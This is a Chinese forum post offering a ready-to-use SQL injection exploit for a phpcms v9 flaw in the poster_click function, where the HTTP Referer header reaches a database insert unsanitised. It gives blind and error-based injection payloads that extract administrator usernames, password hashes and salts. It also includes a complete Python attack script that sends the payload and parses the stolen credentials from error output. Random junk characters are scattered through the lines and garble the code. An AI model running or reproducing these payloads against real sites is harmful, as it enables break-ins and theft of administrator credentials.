有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:$ I( v! D3 z5 A# y6 \
4 g7 b! q. X t8 \& P% \, O
问题函数\phpcms\modules\poster\index.php
& e' m& \6 y' c9 c5 b' H5 ^, G- o4 \# y. @
public function poster_click() {; |+ z5 M6 f C7 S3 R
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;- j0 {6 E! E! {0 \4 z2 q% P, ` D
$r = $this->db->get_one(array('id'=>$id));
$ W( @! c' u* U; [# ^9 o9 Pif (!is_array($r) && empty($r)) return false;
# M- E9 N5 e4 u; [$ip_area = pc_base::load_sys_class('ip_area');
" l0 \1 S, E2 Y ^$ip = ip();
* q6 I# b3 q" ^0 q$area = $ip_area->get($ip);
: G# k2 }; `* ]/ N9 y( n7 }4 D$username = param::get_cookie('username') ? param::get_cookie('username') : '';
# t" S5 ^$ V) k& }if($id) {
6 Z4 p# H' X9 H5 D8 T2 m$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
7 B- q( t) `* P& k! H- ^$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));2 Y5 @9 G& i7 f3 y
}3 s7 d4 x6 |" p4 u; H6 j
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));6 r `0 k3 q$ ]4 G
$setting = string2array($r['setting']);
4 v s5 Q; \6 s! W7 B' o5 wif (count($setting)==1) {5 e4 O7 b/ E8 @( ]% y. l! p# c
$url = $setting['1']['linkurl'];
" ]7 R& T" A D/ ]# [- _2 ^5 u} else {
! I1 P P3 b2 c7 z7 O8 o1 s$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
5 c7 J6 X/ Z E7 v% w6 N. K- U}
+ |8 ~# C ~% n4 i4 e4 wheader('Location: '.$url);
+ ^; q) s4 H# }* c/ f}' S6 R; t6 `3 X: R( E5 l
7 z3 K, n: m0 e( x& @5 q$ j
" z; l* N/ _& @# j! v( k x" R4 m/ d8 l
利用方式:$ F# l3 k: ^- ?! T6 F! U
) @+ N' _- n Q% T+ d/ V1、可以采用盲注入的手法:
# G6 `+ g' I3 T1 Q( R- i- v5 J6 J; s/ r* |$ [3 g6 I
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
0 C% n! t! T) E
6 B$ z. J8 F% j( l4 Q通过返回页面,正常与否一个个猜解密码字段。
* m# D' P: }0 t/ o" f. G; ?4 Z$ ~, G9 W' h! E( n' F! L/ Y0 T+ y
2、代码是花开写的,随手附上了:$ x. E! m7 m/ D: e
& a* w/ q" @* L. f6 W* q& d7 p
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
. E. J/ S) |3 a6 D8 }9 k. N8 C* Z2 { S3 V+ ~$ [
此方法是爆错注入手法,原理自查。
) V0 i! L' a: v3 f. M4 V
! a8 v0 D7 O, D
. J4 P# f" W& K! a
! C# s8 R! L( x( o+ }$ v" K利用程序:
! s* P- _/ `4 H, c7 Y" E
* t8 q. f( j% N" ~#!/usr/bin/env python. _9 v6 T8 X- J: [+ H
import httplib,sys,re
3 [, E/ J( }& h2 T D, h1 i3 G* k, D% ]+ Y4 l/ t3 R$ }" K4 M+ s
def attack():; _4 b# h3 D1 r
print “Code by Pax.Mac Team conqu3r!”
2 r3 Y. m e7 `* Y7 l) j: Z1 ]print “Welcome to our zone!!!”
. P% d0 V# n. Z- o+ Vurl=sys.argv[1]
0 a- J7 X6 u* ?* h- Z$ [paths=sys.argv[2]
) T7 ]1 Q- S- `% Z, Mconn = httplib.HTTPConnection(url)1 N: I6 B S9 N* p
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
+ c( H/ i; P. a+ u- P$ w“Accept”: “text/plain”,
# t3 @6 ]9 \$ n7 n! C- N) s“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}. \# W- W1 z' J c3 ]( L
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): B- A6 \0 U0 V3 V5 L/ ?8 R+ b
r1 = conn.getresponse()& _/ b$ D3 D$ B: r2 ^
datas=r1.read(), G5 R! g; u7 ~, `- j" i
datas=re.findall(r”Duplicate entry \’\w+’”, datas)5 E% j. J3 @1 z; c. f
print datas[0]
4 ?( c6 J3 M! }# q8 T9 |conn.close()
3 R \$ Z6 |+ y. B3 yif __name__==”__main__”:3 C, H$ D* w+ Z* ^1 A \& A
if len(sys.argv)<3:
8 q" ]9 C; ?4 T- b E' ?print “Code by Pax.Mac Team conqu3r”
1 @# T5 B1 R2 J5 E+ kprint “Usgae:”
7 @8 I" {9 J" f3 Z# {- N; P( yprint “ phpcmsattack.py www.paxmac.org /”8 f }" K6 j+ f- p5 d- z, j7 Y
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
" G) A$ G: r$ W6 t$ G/ q: Fsys.exit(1)! z7 C( V0 q" z+ }6 G/ o) W
attack()" ?9 B. E2 P( S) I$ x
. Y7 O1 Y2 s- B2 K( g; g: E
|
发表于 2013-1-11 21:01:00
收藏
支持
反对